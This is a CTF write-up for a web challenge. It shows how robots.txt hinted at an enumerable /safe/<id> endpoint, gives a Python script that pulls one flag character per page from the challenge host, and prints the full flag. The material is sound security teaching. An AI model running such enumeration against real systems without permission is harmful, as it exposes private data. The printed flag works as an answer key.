avatar
Cyscom
Cybersecurity Student Community of VIT Chennai
  • CTF EVENTS
  • CATEGORIES
  • TAGS
  • ARCHIVES
  • POSTS
  • ABOUT
Home CyberConverge 2026 Reconfiguration Terminal
Writeup
Cancel

Reconfiguration Terminal

Reconfiguration Terminal

  • Author: Yashwant Gokul P

This is a web exploitation challenge involving predictable resource enumeration.

The hint:

1
Numbers are truth, and truth always leaks through the cracks

suggests looking for numeric endpoints. Checking robots.txt reveals:

1
Disallow: /safe/420

Testing /safe/1, /safe/2, and /safe/3 returns individual characters from the flag, confirming that the /safe/<id> endpoint can be enumerated.

Instead of checking every page manually, we automate the requests and extract the character from each response until a 404 is reached.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import requests
from bs4 import BeautifulSoup

BASE = "https://reconfiguration-terminal.netlify.app/safe/{}"
flag = ""

for i in range(1, 1000):
    r = requests.get(BASE.format(i))

    if r.status_code == 404:
        break

    soup = BeautifulSoup(r.text, "html.parser")
    p = soup.find("p")

    if p:
        flag += p.text.strip()

print(flag)

The enumeration reconstructs the complete flag.

The flag would be:

CYS{7h3_h0ur6l455_5h4773r3d_bu7_m3m0ry_r3m41n5_1n_fr46m3n75_pl3453_l1573n_cl053r_65537_2025}

Flag

CYS{7h3_h0ur6l455_5h4773r3d_bu7_m3m0ry_r3m41n5_1n_fr46m3n75_pl3453_l1573n_cl053r_65537_2025}
Edit on GitHub
Trending Tags
authentication idor sql-injection ssti xss

© 2026 Cyscom. Some rights reserved.

Using the Jekyll theme Chirpy.

A new version of content is available.